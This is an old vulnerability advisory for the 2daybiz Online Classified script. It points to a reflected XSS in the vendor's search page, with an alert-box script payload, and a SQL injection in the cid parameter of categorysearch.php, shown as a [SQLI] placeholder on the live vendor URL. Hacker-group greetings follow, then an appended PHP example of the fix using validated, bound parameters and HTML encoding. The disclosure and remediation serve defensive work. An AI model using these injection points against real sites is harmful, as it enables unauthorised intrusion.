2daybiz Online Classified script (SQL/XSS) Multiple Vulnerabilities

2010-06-29 16:03:57

# Exploit Title: 2daybiz Online Classified script Multiple (SQL Injection & XSS) Vulnerabilities
# Date: 25/06/2010
# Author: r45c4l
# Email: r45c4l[at]hotmail[dot]com
# Site : www.garage4hackers.com
# Script url: http://www.2daybiz.com/online_classified_script.html
# Version: N/A
# Tested on: Windows
# CVE : ()

=================Exploit======
---Indian Cyber warriors---



[ EXPL0!T ]

1- XSS

http://www.2daybiz.com/products/classified/search.php

Go to the page and type the following into the search bar: <script>alert("r45c4l");</script>

2- SQL Injection

p0c - www.site.com/products/classified/categorysearch.php?cid=[SQLI]

dem0 - http://www.2daybiz.com/products/classified/categorysearch.php?cid=[SQLI]



===========================================================

Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Sandeep, Th3 RDX,

Vaibhav, All members of ICW and Hackers Garage, and all Indian Hackers

Greetz to: Lucky and Atul and team ICA

PROUD TO BE AN INDIAN

c0d3 for motherland, h4ck for motherland

Special Greetz to : www.hack0wn.com www.exploits-db.com www.inj3ct0r.com

=== End () ====
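
Added example, not part of the original advisory and not the vendor's code: one way to close both issues server-side, assuming the script is PHP (per the .php URLs) and can use PDO. The ads table, its columns and the function names are hypothetical, since the page shows neither the script's source nor its schema.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the script's database; the real schema is not on the page.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ads (id INTEGER PRIMARY KEY, cid INTEGER, title TEXT)');
$db->exec("INSERT INTO ads (cid, title) VALUES (1, 'Used bike'), (2, 'Flat to rent')");

/** Accept cid only if it is a positive integer; anything else is rejected, not cleaned up. */
function parse_cid($raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (cid[]=...) and missing parameters
    }
    $cid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $cid === false ? null : $cid;
}

/** Category lookup with cid bound as a typed parameter, never concatenated into the SQL text. */
function ads_in_category(PDO $db, $rawCid): array
{
    $cid = parse_cid($rawCid);
    if ($cid === null) {
        return []; // invalid cid: no query is issued at all
    }
    $stmt = $db->prepare('SELECT id, title FROM ads WHERE cid = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Echo the search term back into HTML only after entity-encoding it. */
function render_search_heading(string $term): string
{
    $safe = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>Results for "' . $safe . '"</h2>';
}

// Constructed inputs: a valid id, the advisory's [SQLI] placeholder, and its search-bar string.
var_dump(ads_in_category($db, '2'));
var_dump(ads_in_category($db, '[SQLI]'));
echo render_search_heading('<script>alert("r45c4l");</script>'), PHP_EOL;
```

The same encoding has to be applied wherever search.php writes the term back into the page, and the encoding context changes if the term lands inside an attribute or a script block rather than element text.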

Fixes

No fixes
